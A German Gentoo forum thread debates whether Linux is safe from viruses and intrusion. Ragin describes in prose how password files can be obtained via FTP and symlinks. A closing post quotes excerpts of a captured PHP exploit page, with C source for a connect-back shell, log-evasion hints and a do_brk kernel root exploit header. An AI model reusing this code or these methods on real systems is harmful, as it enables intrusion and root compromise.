> Und noch eine Frage, du bist dir sicher das du über Gentoo und Linux redest??
> 
> 

 

bist du dir sicher, dass du überhaupt ansatzweise weisst, wovon du redest???  :Shocked: 

naja, das wird mir langsam zu *** der thread... *grins*

gruss

rootshell

----------

## Ragin

 *Deever wrote:*   

> Wie kommst du darauf? Linux funktioniert sehr wohl ohne offene Ports.

 

sicher gehts, aber schonmal angeschaut, was die Konsole dann ständig für dümmliche Fehlermeldungen ausgibt?

Ich habs bisher zumindest noch nicht hinbekommen, dass das System ohne nen gültigen smtp (min. ssmtp) ordentlich läuft. Und somit ist ein Port offen.

 *Quote:*   

> Nein, Ports werden nicht gelegt, sondern geöffnet, geschlossen oder mit z.B. iptables kaputtgemacht.

 

Drücken wir es so aus: Die Ports werden oftmals auch standardmäßig nur an 127.0.0.1 gebunden, damit Zugriff von außen nicht erfolgen kann. Durch IPTables kann man diese dann noch weiter einschränken und filtern...

Wobei ich nicht glaube, dass für unseren norc diese Forumlierung anders ist als die andere...

----------

## DerMojo

 *Ragin wrote:*   

> sicher gehts, aber schonmal angeschaut, was die Konsole dann ständig für dümmliche Fehlermeldungen ausgibt?
> 
> Ich habs bisher zumindest noch nicht hinbekommen, dass das System ohne nen gültigen smtp (min. ssmtp) ordentlich läuft. Und somit ist ein Port offen.
> 
> 

 

Ähm, also wenn du nur die Ports von außen sperrst, läuft dein System trotzdem.

Dass Ports nach/zu localhost offen sind, ist logisch, aber soweit kein Problem, denn um die nutzen zu können, musst du auf dem Rechner drauf sein.

Kannst ja mal versuchen deine Absender-IP zu fälschen und durch 127.0.0.1 ersetzen. Da wird sich allerdings der nächste Router wundern...

iptables ist unser Freund!

Daniel

P.S.: @norc: Nur weil du ein Programm nicht startest, heißt das noch lange nicht, dass es nicht ausgeführt wird!

----------

## sirro

 *Ragin wrote:*   

> Ich habs bisher zumindest noch nicht hinbekommen, dass das System ohne nen gültigen smtp (min. ssmtp) ordentlich läuft. Und somit ist ein Port offen.

 

Ich schon. Keine seltsamen Fehlermeldungen oder sonstiges. Ein smtp-server läuft nicht.

Übrigens geht das auch ohne Probleme mit Windows, wie der Rechner meiner Schwester beweist.

----------

## Ezekeel

man sollts nicht glauben - ich habe die ganzen 2 Seiten des Threads recht interessiert gelesen, da es meine bisherige Meinung, dass Linux zumindest für mich sicherer sei als Windows ziemlich in den Grundfesten erschüttert hat. 

eine Frage hätte ich dann doch noch - ist Linux dann überhaupt für Einsteiger geeignet? 

Ich habe vor 2 Wochen in etwa Gentoo diesmal wirklich als Ersatz für Windows und nicht nur als 2t System installiert. Davor hatte ich zwar ab und an Linux auf einem meiner PCs, habe es aber meist nur drauf gehabt um es eben zu haben und vielleicht einmal irgendwelche Dinge zu reparieren die mit Windows nicht so einfach gegangen wären. 

Einer meiner Hauptgründe war aber auch, dass ich hoffte vor schädlichen Programmen geschützt zu sein. In den Medien hört man ja schließlich meist nur positive Dinge wie dass der 2.6er kernel keine Overflows mehr zulassen soll etc. 

Mir kam dabei nie der Gedanke, dass ich als Anfänger unter Linux 10.000 mal mehr gefärdet bin gehack zu werden als einigermaßen experienced unter Windows wo ich weiss welche Services was bedeuten und die Fehlercodes einigermaßen verstehe.

Unter Linux hingegen kann ich nur rätsel raten wenn ich eine Fehlermeldung sehe und die Logs sind eh zu einem großen Teil ein Buch mit sieben Siegeln für mich ganz davon abgesehen, dass ich auch keine Lust habe in meiner paranoiden Veranlagung lust habe mir jedes Log mehrmals täglich durchzulesen ob irgendwer mein System gehackt hat.

Klar im Grunde genommen könnte es mir ja auch egal sein, ich habe keine geheimen Dateien auf meiner Platte die Wirtschaftlichen Schaden andrichten könnten. Das Onlinebanking klappt nur mit tans die immer nur einmal klappen und meine pw für Linux sind andere wie die die ich im Geschäft verwende. 

Nichts desto trotz - wieso sollte man denn auf Linux umsteigen wenn die große Sicherheit doch nicht so groß ist wie sie immer von den Medien gepriesen wird? 

Unter Windows habe ich zumindest einen Virenscanner mit täglich neuen Virendefinitionen der unter Linux meines Wissens zumindest nicht allzu gut funktioniert. Ich kann mir eine Firewall mit Zonealarm einrichten und muss mir nicht erst ein 300 seitiges Tutorial über iptables durchlesen. Und so geht es gerade weiter. 

Ich möchte mal bezweifeln, dass ich unter einem Jahr ständiger Arbeit mit Linux mein System wirklich sicher machen kann.

Sicher Linux hat weitaus mehr Vorteile als die Sicherheit. Aber ich denke der größte Vorteil ist nun mal wirklich jener. 

Die ganzen anderen Dinge wir OpenSource usw. sind zwar ganz nett, aber man bekommt zu jedem neuen PC eine OEM CD und selbst das kleinste Kiddie kann heute die Aktivierung umgehen - Marktpolitik von Windows damit Linux nicht die überhand gewinnt?! 

Und dass es die Ressourcen besser ausnutzt wie Windows ist unter dem Aspekt, dass MS eng mit der Hardwareindustrie zusammenarbeitet nicht wirklich wichtig, da ja laufend neue Prozessoren rauskommen und ich muss sagen, dass mein WindowsXP auf meinem 2400er auch recht flott läuft und kaum noch abstürze hat.

Der ganze Thread weicht nun ein wenig vom Thema ab, aber mal ganz im Ernst. Vom Sicherheitsaspekt her ist ja dann Linux für einen neuling für mich weitaus unsicherer als Windows!!! Ich sitze zwar hinter einem Router der eine Firewall integriert hat und habe auch momentan kein Java unter Linux installiert und öffner 1000% keine Emailanhänge, aber das ganze andere Zeugs von wegen exploits usw. hört sich in meinen Ohren recht böse an. 

Keine Sorge, ich werde auf keinen Fall Linux gleich wieder von meiner PLatte löschen, dazu macht es mir momentan viel zu viel Spaß, aber ich werde in Bezug auf Linux doch wesentlich umdenken müssen und mich erst einmal in iptables einlesen bevor ich mit  Spielekonfiguration und Wine anfange!!

----------

## Ragin

 *DerMojo wrote:*   

> Ähm, also wenn du nur die Ports von außen sperrst, läuft dein System trotzdem.
> 
> Dass Ports nach/zu localhost offen sind, ist logisch, aber soweit kein Problem, denn um die nutzen zu können, musst du auf dem Rechner drauf sein.
> 
> Kannst ja mal versuchen deine Absender-IP zu fälschen und durch 127.0.0.1 ersetzen. Da wird sich allerdings der nächste Router wundern...
> ...

 

Das ist mir auch klar. Es geht hier aber darum, dass ein Anfänger (wie norc) schnell mit einem Linux angegriffen werden könnte. Wer nicht aufpasst hat halt schnell Dinge mögliche Lücken.

Und da norc der Meinung war, dass Linux 100% Virensicher ist, war das ein Beispiel, wie er einfach und schnell angegriffen werden kann.

 *sirro wrote:*   

> Ich schon. Keine seltsamen Fehlermeldungen oder sonstiges. Ein smtp-server läuft nicht

 

Hmm...

Gentoo möchte bei mir generell irgendeinen Mailer (Standardmäßig ssmtp) installieren. Ich hab einmal alles in der Richtung runter geschmissen, danach hatte aller paar Minuten eine Meldung auf der Konsole "Port 25 not available cant send mail to...", weil irgendein Daemon eine Meldung an root schicken wollte. Nachdem ich wieder einen Mailer installiert hatte wars auch weg...

 *Ezekeel wrote:*   

> man sollts nicht glauben - ich habe die ganzen 2 Seiten des Threads recht interessiert gelesen, da es meine bisherige Meinung, dass Linux zumindest für mich sicherer sei als Windows ziemlich in den Grundfesten erschüttert hat.
> 
> eine Frage hätte ich dann doch noch - ist Linux dann überhaupt für Einsteiger geeignet? 

 

Wenn du etwas aufpasst und das System aktuell hältst, damit keine alten Sicherheitslücken ausgenutzt werden können bist du generell sicherer als unter Windows. Schau dir allein die ganzen Würmer und Viren an, du tag täglich per Mail Windows angreifen. Unter Linux brauchst du dafür nur ein müdes lächeln und kannst die Mails einfach löschen. Win.-Würmer haben gar keine Chance auf deinem System etwas zu machen.

Windows ist ohne vorgeschalteten Router, Firewall kaum wirklich sicher zu bekommen. Irgendwie kommt immer ein neues Loch. Wobei man unter Windows schon um einiges sicherer ist, wenn man keine Microsoft Produkte wie Outlook und IE nutzt  :Smile: .

Demnach ist Linux auch (oder gerade) für Einsteiger besser geeignet, da diese dann nicht mit jeder tollen Virusmail ihr System restlos verseuchen.

Dein Problem mit den Logs und den Meldungen löst du am besten mit einer Suchmaschine und/oder Dokus. Im Normalfall suchst du kurz und hast auch gleich eine einigermaßen befriedigende Auflösung.

----------

## cryptosteve

 *Ezekeel wrote:*   

> [ ... zuvieles, um es einzeln zu quoten ... ]
> 
> 

 

Linux ist meiner Meinung nach bedingt für Einsteiger geeignet. Der Lernaufwand für die erstmalige Nutzung mag etwas höher sein, aber ein aktuelles Windows ist derweil auch alles andere als trivial.

Deine Annahme, dass Du unter Linux 10.000 mal mehr gefährdet bist, halte ich für falsch. Das ist erstens eine Sache der Distribution (je weniger Dienste standardmäßig laufen, desto sicherer) und die aktuelle Sasserwelle sollte verdeutlichen, dass Windows auch nicht das Gelbe vom Ei ist. Mich haben heute bestimmt 20 Leute nach Sasser gefragt, und sie alle hatten einen Virenscanner mit angeblich aktuellen Signaturen und sie alle hatten eine Firewall. Die Gründe reichten von 'Firewall gerade runtergefahren' bishin zu 'das kann gar kein Sasser sein'. Der Fehler wurde von Microsoft bereits im April mit hoher (höchster?) Sicherheitseinstufung bekanntgegeben, einen Fix haben sie bislang nicht geliefert. Für Linux kommen die Updates wenigstens recht flott hinterher.

Was Dein Verständnis für Fehlermeldungen angeht: wie lange bist Du jetzt bei Windows? Jahre? Du kannst natürlich jahrelange Erfahrung mit Windows nicht innerhalb von Wochen / Monaten unter Linux aufholen. Sowas braucht halt seine Zeit. Irgendwann kommt aber der Durchblick und wenn Du dann nochmal unter Windows unterwegs bist, wirst Du '-v', '--verbose', und detaillierte Logfiles schmerzlich vermissen. 

Windows mag in bestimmten Bereichen sicherlich seine Vorzüge haben, aber ich möchte auf keinen Fall wieder zurück. Ich habe mein Windows im September 2002 von der Platte geschmissen (nach gerade mal zwei Wochen Linux-Einstieg) und ich habe den Schritt bis heute nicht bereut. Ich bin nicht über alle Maßen lernfähig und willig, aber wenn Du die richtigen Leute triffst, die Dich etwas in die richtige Richtung lenken, dann ist der Rest meines Erachtens nach ein Selbstgänger.

Und zum Abschluß sei noch gesagt: für den Anfang gibt es fertig gestrickte IPTables-Skripte, deren Installation recht easy ist. Google hilft weiter und wenn Du alleine nicht klarkommst, melde Dich im Forum oder direkt bei mir.

----------

## DerMojo

 *Steve` wrote:*   

> Und zum Abschluß sei noch gesagt: für den Anfang gibt es fertig gestrickte IPTables-Skripte, deren Installation recht easy ist. Google hilft weiter und wenn Du alleine nicht klarkommst, melde Dich im Forum oder direkt bei mir.

 

Dito!

Wenn du unter Linux dein System grob aber komplett dicht machen willst, brauchst du einen iptables-Befehl, nämlich um alle eingehenden Pakete zu verwerfen. Ist zwar die Holzhammer-Methode, aber als Anfang...

Auf der anderen Seite muss ich "fwbuilder" empfehlen: Einfach per Drag & Drop alles zusammenzimmern und schon steht die Firewall. Dafür braucht man keine iptables-Kenntnisse, nur Ahnung von Netzwerken. (und ohne die kriegst du auch Windows nicht sicher)

Soviel zur Absicherung...

Nachdem, was ich hier so alles gelesen habe, ist mir klar, dass Linux weniger sicher ist als man glaubt. Es hat aber den großen Vorteil, dass es sich leichter sicherer machen lässt als Windows. Denn wer weiß, was da alles für Dämonen unter der Haube lauern...

Hier auf meiner Kiste kann ich brav alles abschalten, was ich nicht brauche, und alle eingehenden Ports, die ich nicht brauche, werden einfach gesperrt. Fertig und aus.

Ob Linux was für Einsteiger ist, kommt auf den Einsteiger an. Wenn man gar keine Ahnung von Computern hat, ist man ganz alleine meist eh aufgeschmissen, egal welches OS man benutzt. Im Zweifelsfall ist man mit Linux aber doch IMHO besser bedient, weil die ganze Würmer- und Virenflut auf M$-Systeme zielt, und man sich auf ner Linux-Kiste gemütlich zurücklehnt und grinst, wenn die neuesten Schreckensmeldungen über den Newsticker laufen.   :Very Happy: 

</2cents>

Daniel

----------

## cryptosteve

 *DerMojo wrote:*   

> Wenn du unter Linux dein System grob aber komplett dicht machen willst, brauchst du einen iptables-Befehl, nämlich um alle eingehenden Pakete zu verwerfen. Ist zwar die Holzhammer-Methode, aber als Anfang...
> 
> 

 

Ja, aber so 'holzhammerig' finde ich die Methode gar nicht. Man sollte sich natürlich schon ein wenig mit der Materie beschäftigen. Und bis man die drauf hat, macht man erstmal alles dicht. Dann lernt man Schritt für Schritt welche Dienste wirklich notwendig sind und wie man die Port wieder aufmacht. 

Ich halte Deinen Vorschlag für ein durchaus legitimes Mittel ...

----------

## norc

Dann eine Frage.. 

was definiert ihr als Ports?

ich bin der Meinung, 

ihr wüsstet nicht was Ports genau sind..

Jetzt bin ich besser informiert; So einfach geht das nicht..

Das mit dem rsync rotationsserver, war nur ein Bug der schon fixed ist

(Außerdem ist das ein halbes jahr her (2.12 oder so)). Und jetzt bitte ich euch einen Virus vorzuführen, wo ihr mir erklärt was er genau machen soll. Ihr sollt mir nicht den Quellcode geben, sondern genauestens sagen was er macht. dann werdet ihr merken, dass das nicht geht. zumindest unter gentoo nicht.

ANMERKUNG::

http://www.clanscripte.net/main.php?content=newskommentare&action=view&newsid=355

 *Quote:*   

> ps: es gibt nur linux-virenmuster, jedoch noch keinen bekannten funktionierenden virus. berichte über linuxviren sind 99% fiktiv und meist von microsoft verbreitet.

 

----------

## Ragin

Definition Ports: http://www.net-lexikon.de/Port-Protokoll.html

Beispiel Exploid mySQL:

Ein Exploid greift eine bekannte Schwachstelle an, provoziert einen Buffer Overflow.

Danach kann der Exploid beliebige Befehle mit der Berechtigung des geknackten Prozesses (hier mySQL) ausführen.

Er kann somit auch mySQL - Daten ändern/auslesen. Teilweise kann man so auch an root-Passwörter kommen oder dieses einfach ändern. Je nach konfiguration des Systems.

Beispiel FTP-Hacking:

hat man einen FTP laufen (idealerweise noch einen anonymous) kann man sich auf den meisten Systemen die Dateien /etc/passwd und /etc/shadow besorgen. Diese sind dann knackbar und man kann sich später als anderer Nutzer einloggen oder einfach über ssh drauf kommt.

Beispiel SSH-Hacking:

(Bedingung ist ein Server wo der Angreifer auch Zugang hat...wobei ein Zugang auch durch obige Methoden besorgt werden können oder die Leute einfach durch "Social Engineering" dazu gebracht werden Zugang frei zu geben. Es gibt bestimmte Dateien, die im Homeverzeichnis existieren (z.Bsp. .history .bash_rc ...).

Diese kann man löschen und symbolische Links auf /etc/passwd /etc/shadow setzen, wodurch man wie oben an gewisse Daten kommt.

Wer also bei seinem System nicht aufpasst kann selbst bei solchen simplen Standardsachen gehackt werden.

Ob Gentoo, RedHat, SuSE, Debian, Slackware... spielt dabei keine Rolle. Es sind alles Linux-Systeme mit unterschiedlichen Paketzusammensetzungen und unterschiedlichen Konfigurations- und Installationstools.

Ansonsten besteht kaum ein Unterschied.

Der einzigste Vorteil von Gentoo gegenüber den anderen ist, dass man die Pakete schnell, kostenlos und relativ aktuell updaten kann um potentielle Sicherheitslücken zu stopfen.

Ein Virus kann genauso wie ein menschlicher Angreifer autom. über ähnliche Methoden auf dein System eindringen.

Zu deinem Link: Wenn du denen da glauben möchtest bitte, aber nur weil jemand der Meinung ist, es gibt keine Viren unter Linux und die seien alle nur erfunden, dann ists ja prima für dich!

Dann sei dir aber auch bewusst, dass Leute wie du Ziele solcher Angriffe sind, da diese in einer Scheinwelt leben und davon ausgehen, dass ihnen doch mit dem tollen Linux (Gentoo) nie was passieren kann.

----------

## primat

Hallo,

natürlich gibt es Linux-Viren und jedes System ist a priori unsicher. Aber man muss auch sagen, dass man Linux über Jahre hinweg benutzen kann ohne jemals Probleme mit Viren zu bekommen. Ich glaube, dass schafft kein Windows-user! 

Das Problem dabei ist sicherlich, dass dieser Vorteil zum Teil einfach struktureller Natur ist (Linux ist nicht so verbreitet).

Trotzdem, zur Zeit muss man sich noch keine zu grossen Sorgen machen sich plötzlich ein Virus unter Linux einzufangen, was nicht heissen soll, das man nicht vorsichtig sein sollte.

Gruss

----------

## Carlo

 *Ragin wrote:*   

> Der einzigste Vorteil von Gentoo gegenüber den anderen ist, dass man die Pakete schnell, kostenlos und relativ aktuell updaten kann um potentielle Sicherheitslücken zu stopfen.

 

Zwei Monate und mehr sind schnell?

----------

## norc

Ich war grad dabei diesen Thread zu schreiben, da.. naja ist ja auch egal,

Was soll dieser Exploid machen??

Bei mir laufen 4 terminals mit root für emergen, chmod u.ä.

Die Rechner sind non-stop online und ON.

So geht das also nicht (ich meine mit ausspionieren)

Einen FTP lasse ich nicht laufen.

Und mit SSH Funktioniert es wegen der oben geschilderten Unfähigkeiten, Passwörter herauszufinden, nicht.

Und das mit dem Link war nur ein kleine Spaß.. :Wink: )

Primat:

Worauf willst du hinaus. Wir diskutieren nicht mehr(!!) über die Existenz, sondern über das, ob, ob nicht, ob, wenn dann wie, funktionieren dieser.    :Cool: 

Also wenn du welche kennst oder homepages kennst wo sie definiert sind, dann bitte einen Link oder Namen dieser Viren.

Carlo.

 *Quote:*   

> Zwei Monate und mehr sind schnell?

 

Worauf willst du hinaus?? auf den rsync Rotationsserver?

Wenn ja, die Fehlersuche hat ein paar Stunden, gedauert.

Und der Bugfix ist meiner Meinung nach ein paar(?!?) (ich weiss nicht genau wann) Tagen bereits herausgekommen.

Wenn du 1 1/2 Monate brauchst um herauszufinden, dass da was war, und nur ein 1k modem (gibt es das überhaupt?? (wenn nein, ist doch egal, ist nur ein Beispiel)) hast, mit dem du mehr als einen halben Monat das entsprechende File emerged, dann ist das kein Wunder.  :Wink: 

----------

## primat

@norc

 *Quote:*   

> Wir diskutieren nicht mehr(!!) über die Existenz, sondern über das, ob, ob nicht, ob, wenn dann wie, funktionieren dieser.

 

Hä?? Wo ist der Unterschied zwischen der Existenz und dem "ob, ob nicht, ob," wie du es nennst?

----------

## Carlo

norc: Guck selber nach wie lange es teilweise dauert, bis ein sicherheitsrelevanter Bug in ein überarbeitetes Ebuild und GLSA mündet.

 *norc wrote:*   

> Also wenn du welche kennst oder homepages kennst wo sie definiert sind, dann bitte einen Link oder Namen dieser Viren.

 

Klar - darf es auch noch ein Baukastensystem sein?

----------

## stahlsau

und wieder stellt sich mir die Frage: ist er schon älter als 12?   :Twisted Evil: 

 *Quote:*   

> Und mit SSH Funktioniert es wegen der oben geschilderten Unfähigkeiten, Passwörter herauszufinden, nicht. 

 

Wer lesen kann ist klar im Vorteil. 6 Posts weiter oben wird dir doch deutlich geschildert, wie man an die Passwörter kommen kann.

Wenn du glaubst, das du sicher bist, leb damit...

----------

## Ragin

@carlo:

2 Monate sind aber auch nicht die Regel.

Schau dir andere Distributionen an, da dauert das schonmal 4 Monate und mehr. Mandrake hat sogar eine komplette Version mit einem Trojaner im SSH Klienten rausgebracht. Bei Gentoo kann man diesen Fehler schnell korrigieren, da dieser nach bekanntwerden und "stopfen" im Portage gelandet wäre und somit beim nächsten Update weg wäre. Bei Mandrake muss ich erst nach einem RPM suchen, das runterladen, installieren. Sind 2 Schritte mehr und die haben auch nur dann Sinn, wenn ich es irgendwie mitbekommen habe. Gentoo "zwingt" mich zumindest bei gelöstem Fehler dazu mal drüber nachzudenken ob ichs mach oder nicht.

@norc:

Was du für dich laufen lässt spielt keine Rolle. Das oben genannte waren nur Beispiele, die ich bereits probiert habe -> ich auch bestätigen kann, dass es funktioniert. Es gibt auch massenhaft andere Möglichkeiten. Linux hat ja immerhin mehr als genug Programme, die fehleranfällig sind. Das können unter Umständen selbst deine binutils oder andere Dinge sein, die du brauchst. Zu denken es gäbe keine Viren oder gravierende Sicherheitslöcher in Linux ist Aberglaube und dummes Geschwätz!

Nur ist es unter Linux einfach schwerer solche Löcher in Massen auszunutzen. Bei Windows kannst du dir immerhin fast sicher sein, dass jeder 4. Computer ein potentielles Opfer ist. Linux hat aber zuviele unterschiedliche Programmversionen und somit ist die Wahrscheinlichkeit extrem gering erfolgreiche Angriffe auf ein System mit einem einfachen Wurm auszuführen, der auf bestimmte Lücken abziehlt.

Genaue Informationen über Viren für Linux findest du unter: http://www.kaspersky.de, http://www.nai.com oder http://www.symantec.de. Einfach mal ein bisschen danach schauen.

----------

## Carlo

 *Ragin wrote:*   

> 2 Monate sind aber auch nicht die Regel. Schau dir andere Distributionen an, da dauert das schonmal 4 Monate und mehr.

 

Und!? Das ist selbst im Einzelfall schlicht inakzeptabel; Zumal die Warnung auch erst dann erfolgt, wenn der Fehler beseitigt ist.

----------

## norc

Wenn das so einfach wär.  Ragin, dann sag mir das rootpasswd von:

majestix.homelinux.net

ssh läuft zurzeit.

die homepage lautet folglich

http://majestix.homelinux.net/

ich warte...

das müsste doch einfach sein..

----------

## primat

Worin soll unser Interesse bestehen Dir Dein Unwissen vorzuführen? Lebe damit und sei glücklich!

Gruss

----------

## norc

Es geht weniger um mein Unwissen, als um einen Beweis, dass es wirklich funktioniert, was ihr behauptet, denn ich habe bis jetzt noch nicht das gesehen was ihr meint. Ich sehe bisher keine Möglichkeit. Und wenn er sagt, dass das mit dem Knacken wirklich funktioniert, dann kann es ja kein großes Problem sein, mit vorzuführen, dass es einfach ist Viren, Trojaner oder Expoits für Gentoo, bzw. linux, zu schreiben.

Angenommen er könnte dies alles wirklich, dann hieße das, dass es nicht überaus schwer wäre, und daraus könnte ich dann folgern, das gentoo, bzw linux, nicht sicherer als WindowsXP wär. Denn dann würden doch viele Viren nach Ragins's Muster funktionieren und kein Rechner wäre mehr gesichert. Jeder mittelmäßige Hacker würde die Methode schnell herausfinden die Ragin benutzt haben will. Es sei denn er wär der weltbeste Hacker, was ich aber nicht erkennen kann...

Aber zurzeit (!!) werden keine Gentoo-server oder Rechenr gehackt, denn das wäre ja sofort bekannt, denn es gibt hier nicht so die GerüchteKüche wie bei Microsoft. Also muss das heißen, dass es keine bekannte Möglichkeit gibt, ein upgedatetes Gentoo zu hacken, aus den obigen genannten Methoden. 

Und die angeblichen Möglichkeiten von Ragin beruhen nur auf irgendwelchen Vorkomnissen bei absoluten Vollidioten, die meinen ein Rechner benötige keine Firewall und kein Passwort.

----------

## birnbaumtruhe

 *norc wrote:*   

> Es geht weniger um mein Unwissen, als um einen Beweis, dass es wirklich funktioniert, was ihr behauptet, denn ich habe bis jetzt noch nicht das gesehen was ihr meint. Ich sehe bisher keine Möglichkeit. Und wenn er sagt, dass das mit dem Knacken wirklich funktioniert, dann kann es ja kein großes Problem sein, mit vorzuführen, dass es einfach ist Viren, Trojaner oder Expoits für Gentoo, bzw. linux, zu schreiben.

 

Warum sollte das schreiben von Exploits schwer sein? Das versteh ich jetzt ehrlich gesagt nicht ...

 *Quote:*   

> Aber zurzeit (!!) werden keine Gentoo-server oder Rechenr gehackt, denn das wäre ja sofort bekannt, denn es gibt hier nicht so die GerüchteKüche wie bei Microsoft. 

 

Was verleitet dich zu der Annahme dass sowas bekannt werden würde? Windows Systeme sind u.U. auch nicht sicher und werden vielmals auch im Netzt als mieser Webserver eingesetzt, trotzdem ist der Heise Newsticker nicht voll damit. Im übrigen ist es vielen Firmen unangenehm solche Dinge zuzugeben - japanische Firmen haben damit ein massives Problem (zum Beispiel).

 *Quote:*   

> Also muss das heißen, dass es keine bekannte Möglichkeit gibt, ein upgedatetes Gentoo zu hacken, aus den obigen genannten Methoden. 

 

Vielleicht möchtest du dich damit auseinandersetzen was eine 0day Exploit ist und dann solltest du nicht vergessen dass zwischen melden einer Sicherheitslücke und dem patchen des betroffenen Packetes ein enormer Zeitunterschied liegen kann. Interessanterweise hat das jemand bereits in einem anderen Thread angesprochen, wenn ich den nur finden würde. Hmpf. Thema waren die GLSAs.

----------

## norc

Aber selbst wenn es einfach wäre, dann könnte er doch die verwendeten Sicherheitslücken melden. Das wäre im Interesse aller Gentoo-User, die es selbst nicht wünschen, dass ihr Rechner (oder die rechner), Opfer eines Virus'

oder eines Hackers werden.

Und wenn du 'birnbaumtruhe' sagst das sei nicht schwierig, dann will ich dir glauben, aber nur solange sich die funktion dieses exploits auf harmlose sachen bezieht was in der Regel der Fall ist. Oday Exploit?? google: 1 treffer auf polnisch oder so.

Aber wenn es funktionieren sollte, dann könnte ragin doch das rootpasswd herausfinden *hämischlach*

----------

## Deever

 *norc wrote:*   

> Aber wenn es funktionieren sollte, dann könnte ragin doch das rootpasswd herausfinden *hämischlach*

 

Oder er benutzt nen Exploit und setzt es einfach neu, ohne irgenwann, irgendwo oder irgendwie einmal irgendein Passwort eingegeben zu haben. Nimm deine Kiste lieber vom Netz, die verkauften Kinder werden es dir danken...

*SCNR*

/dev

----------

## Gekko

 *norc wrote:*   

> Oday Exploit??

 

Oday ist nicht 0day

@norc: Ich hab zwar auch nicht viel Ahnung zwecks Security, aber eins weis ich bestimmt: nix ist sicher, nichtmal mit Linux, BSD oder sonstwas.

Ausserdem wird ein Exploit nicht geschrieben sondern ist u.U. vorhanden und wird ausgenutzt.

LG, Gekko

----------

## McPringle

 *norc wrote:*   

> [Viel Unsinn in letzter Zeit]

 

Ich glaube, entweder stellst Du Dich absichtlich dumm oder Du versuchst hier im Stile der Uni Bielefeld eine Studie durchzuführen, wie es die besagte Uni vor einigen Jahren im Usenet tat.

Ich bin es für meinen Teil leid, mit einer offensichtlich lernresistenten Person zu diskutieren. Dafür ist mir meine meine knappe Freizeit zu kostbar.

EOT

McPringle

----------

## Zappelphillip

Ich bin gestern zufällig über diesen thread gestolpert und kann norc nur bemitleiden....

Ich bin auch zu Linux gewechselt weil es sicherer ist als Windows, allerdings ist es nicht perfekt. Ich will meinen Rechner besser kennen lernen und versuchen das System so dicht wie möglich zu machen. 

Ich beneide Norc... ich würd auch gerne in einer perfekten (:=sicher)  Welt leben, aber meine sieht da anders aus.

Selbst wenn du den Stöpsel zum Internet ziehst gibt es (zugegeben ziemlich theoretisch, bzw hoher Aufwand) Möglichkeiten den Inhalt Deines Monitors auf anderen Rechnern, Anzeigegeräten anzeigen zu lassen.

Sicherheit ist auch ein relativer Begriff. Wovor und wogegen schützen wir uns? Daß fremde meinen Rechner nutzen? Daß irgendjemand Informationen aus meinem Rechner holt (... da gabs mal nen Gerücht, ich habs nicht weiter verfolgt, daß der Half-Life 2 Code geklaut wurde, aber auch genügend andere Beispiele). Ich denke wenn Firmen die eine Vielzahl von Experten für Systemsicherheit haben ihr Systeme nicht 100% dicht bekommen, dann schaffe ich daß als Heimanwender auch nicht.

Zum Thema Viren, ich weis nicht obs den Link schon gab... aber hier steht eindeutig:

 *Quote:*   

> Problem:
> 
>     Das Märchen, daß Linux immun gegen Viren ist hält sich hartnäckig.
> 
> 

 

und:

 *Quote:*   

> 
> 
> "Historisches" Zitat von Vecna ("Autor" des Wurms Hybris) | 11.11.1999 20:49:24 CET:
> 
> Linuxviren existieren. Ich habe bereits einen per-process Linux Virus gesehen, der den PLT Abschnitt der ELF infiziert hat, und ptrace() kann leicht mißbraucht werden 
> ...

 

So, ich hoffe das ich damit nicht zu weit gegangen bin, ansonsten bitte schlagen und brandmarken.

Grüssle 

Phil

----------

## Robelix

 *Ezekeel wrote:*   

> man sollts nicht glauben - ich habe die ganzen 2 Seiten des Threads recht interessiert gelesen, da es meine bisherige Meinung, dass Linux zumindest für mich sicherer sei als Windows ziemlich in den Grundfesten erschüttert hat. 
> 
> 

 

Das schlechteste, das es gibt ist nicht ein unsicheres System sondern ein vermeintlich Sicheres.

Und genau die ist bei vielen Win-Usern gegeben. "Ich hab' ja einen Virenscanner und eine Personal Firewall installiert, mir kann nix passieren!"

Wenn du wirkliche Sicherheit willst, dann mußt du dich - egal unter welchem System - tiefer in die Materie einarbeiten. Da führt kein Weg d'ran vorbei.

Robelix

----------

## Robelix

Wer immer noch einen Linux-Virus sucht... hier ein Wurm der vor 2 Jahren unterwegs war, und sich durch eine Lücke in SSL per Apache verbreitete:

http://securityresponse.symantec.com/avcenter/venc/data/linux.slapper.worm.html

Diese Lücke ist natürlich schon längst geschlossen, aber es könnte jederzeit wieder eine ähnliche gefunden werden.

----------

## ruth

hi,

um jetzt diese diskussion etwas abzukürzen und dem herrn norc seine

dummheit (verzeihung!!!) vorzuführen tu ich jetzt was, was man normaleriweise eben

nicht tut.

ich poste auszüge (!!) eines exploits, der in einem meiner honigtöpfchen

hängengeblieben ist.

ich habe diesen exploit getestet. er ist voll funktional...

das ganze ist eine php seite, die... naja... also:

```

<CENTER>

<DIV STYLE="font-family: verdana; font-size: 25px; font-weight: bold; color: #F3A700;"> !!!ZENSIERT!! Exploit 4.1</DIV>

<BR>

<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">System Information</DIV>

<?php

```

dann gehts weiter:

```

  if ($shell == "write") {

    $shell = "#include <stdio.h>\n" .

             "#include <sys/socket.h>\n" .

             "#include <netinet/in.h>\n" .

             "#include <arpa/inet.h>\n" .

             "#include <netdb.h>\n" .

             "int main(int argc, char **argv) {\n" .

             "  char *host;\n" .

             "  int port = 80;\n" .

             "  int f;\n" .

             "  int l;\n" .

             "  int sock;\n" .

             "  struct in_addr ia;\n" .

             "  struct sockaddr_in sin, from;\n" .

             "  struct hostent *he;\n" .

             "  char msg[ ] = \" !!ZENSIERT!!! Connect Back Shell\\n\\n\"\n" .

             "                \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .

             "                \"For More Reliable Shell.\\n\"\n" .

             "                \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .

             "                \"For Not Getting Logged.\\n(;\\n\\n\";\n" .

             "  printf(\"!!!ZENSIERT!!! Connect Back Backdoor\\n\\n\");\n" .

             "  if (argc < 2 || argc > 3) {\n" .

             "    printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .

```

es wird also C code auf die maschine geladen...

was der tut ??? das steht ja im code...

dann gehts so weiter:

```

  if ($kernel == "write") {

    $kernel = "/*\n" .

              " * !!!ZENSIERT!!!\n" .

              " * Linux kernel do_brk vma overflow exploit.\n" .

              " *\n" .

              " * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .

```

oops, der berühmte do_brk root exploit wird hier geladen...

die hier vorliegende version ist _kein_ proof of concept code, sondern voll funktional...

weiter unten wird dann der compiler aufgerufen, beide exploits ausgeführt.

